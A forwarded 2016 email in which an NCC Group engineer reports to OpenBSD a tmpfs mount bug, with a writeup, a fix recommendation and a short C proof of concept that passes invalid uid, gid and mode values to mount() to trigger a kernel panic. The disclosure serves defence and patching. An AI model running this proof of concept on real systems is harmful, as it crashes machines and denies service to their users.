Here's a bug related to tmpfs mounts.
-------- Forwarded Message --------
Subject: [Bug49] Tmpfs mount with bad args can lead to a panic
Date: Mon, 11 Jul 2016 10:07:33 -1000
From: Tim Newsham <tim.newsham@nccgroup.trust>
To: dera...@openbsd.org, Jesse Hertz <Jesse.Hertz@nccgroup.trust>
Hi Theo, here's a low-severity DoS issue.. root-only unless
kern.usermount is set. Feel free to open it up to "tech" if you see
fit. See writeup below.
------
/*
* mount_panic.c
* Demonstrate a panic through the mount system call.
*
* gcc -g mount_panic.c -o mount_panic
*/
#ifdef BUG_WRITEUP //---------------------------------------------------
Tmpfs mount with bad args can lead to a panic
Impact:
Root users or users on systems with kern.usermount set to true can
trigger a kernel panic when mounting a tmpfs filesystem.
Description:
The tmpfs filesystem allows the mounting user to specify a
username, a groupname or a device name for the root node of
the filesystem. A user that specifies a value of VNOVAL for
any of these fields will trigger an assert in tmpfs_alloc_node():
/* XXX pedro: we should check for UID_MAX and GID_MAX instead. */
KASSERT(uid != VNOVAL && gid != VNOVAL && mode != VNOVAL);
This condition can only be triggered by users who are allowed
to mount a tmpfs filesystem. Normally this is the root user, but
if the kern.usernmount sysctl variable has been set to true,
any user could trigger this panic.
Reproduction:
Run the attached mount_panic.c program. It will mount a tmpfs
filesystem with invalid settings and will lead to a panic of
"panic: kernel diagnostic assertion "uid != VNOVAL && gid != VNOVAL
&& mode != VNOVAL" failed". NCC Group was able to reproduce this issue
on OpenBSD 5.9 release running amd64.
Recommendation:
Validate the args.ta_root_uid, args.ta_root_gid and args.ta_root_mode
fields in tmpfs_mount() before calling tmpfs_alloc_node().
Return an error to the user when an invalid argument is detected.
Reported: 2016-07-XX
Fixed: notyet
#endif // BUG_WRITEUP ---------------------------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/param.h>
#include <sys/mount.h>
#define VNOVAL (-1)
int main(int argc, char **argv)
{
struct tmpfs_args args;
int x;
memset(&args, 0, sizeof args);
args.ta_version = TMPFS_ARGS_VERSION;
args.ta_root_uid = VNOVAL;
args.ta_root_gid = VNOVAL;
args.ta_root_mode = VNOVAL;
x = mount("tmpfs", "/mnt", 0, &args);
if(x == -1)
perror("mount");
printf("no crash!\n");
return 0;
}
--
Tim Newsham
Distinguished Security Engineer, Security Consulting
NCC Group
Tim.Newsham@nccgroup.trust | PGP: B415 550D BEE9 07DB B4C9 F96C 8EFE CB2F 402D
3DF0
